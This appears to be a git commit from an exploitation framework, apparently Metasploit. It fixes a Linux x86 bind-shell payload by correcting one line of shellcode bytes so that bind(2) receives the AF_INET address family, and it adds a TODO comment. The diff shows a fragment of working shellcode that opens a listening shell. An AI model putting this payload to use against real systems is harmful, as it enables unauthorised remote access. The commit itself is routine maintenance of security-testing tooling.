Fix linux shell_bind_tcp payload

egypt · egypt · commit 828f37701d6c · 2012-09-04T04:23:48.000-05:00
It was calling bind(2) with a family of 0x02ff, which makes no sense and causes execution to fall off the end and segfault. Fix it by replacing 0x02ff with the appropriate 0x0002, or AF_INET. [Fixrm rapid7#7216]
diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb
@@ -37,6 +37,13 @@ def initialize(info = {})
 						{
 							'LPORT'    => [ 21, 'n' ],
 						},
+					# TODO: Payload source needs serious cleanup. This payload was
+					# originally generated from
+					# external/source/unixasm/lin-x86-bndsockcode.s which supposedly
+					# worked when it was initially committed. Nevertheless, it was
+					# calling bind(2) with insane parameters, which ended up erroring out
+					# and causing execution to fall off the end of the shellcode,
+					# bursting into flames. See #7216, #7224
 					'Payload' =>
 						"\x31\xdb"             +#   xorl    %ebx,%ebx                  #
 						"\xf7\xe3"             +#   mull    %ebx                       #
@@ -50,7 +57,7 @@ def initialize(info = {})
 						"\x5b"                 +#   popl    %ebx                       #
 						"\x5e"                 +#   popl    %esi                       #
 						"\x52"                 +#   pushl   %edx                       #
-						"\x68\xff\x02\x04\xd2" +#   pushl   $0xd20402ff                #
+						"\x68\x02\x00\x04\xd2" +#   pushl   $0xd2040200                #
 						"\x6a\x10"             +#   pushl   $0x10                      #
 						"\x51"                 +#   pushl   %ecx                       #
 						"\x50"                 +#   pushl   %eax                       #
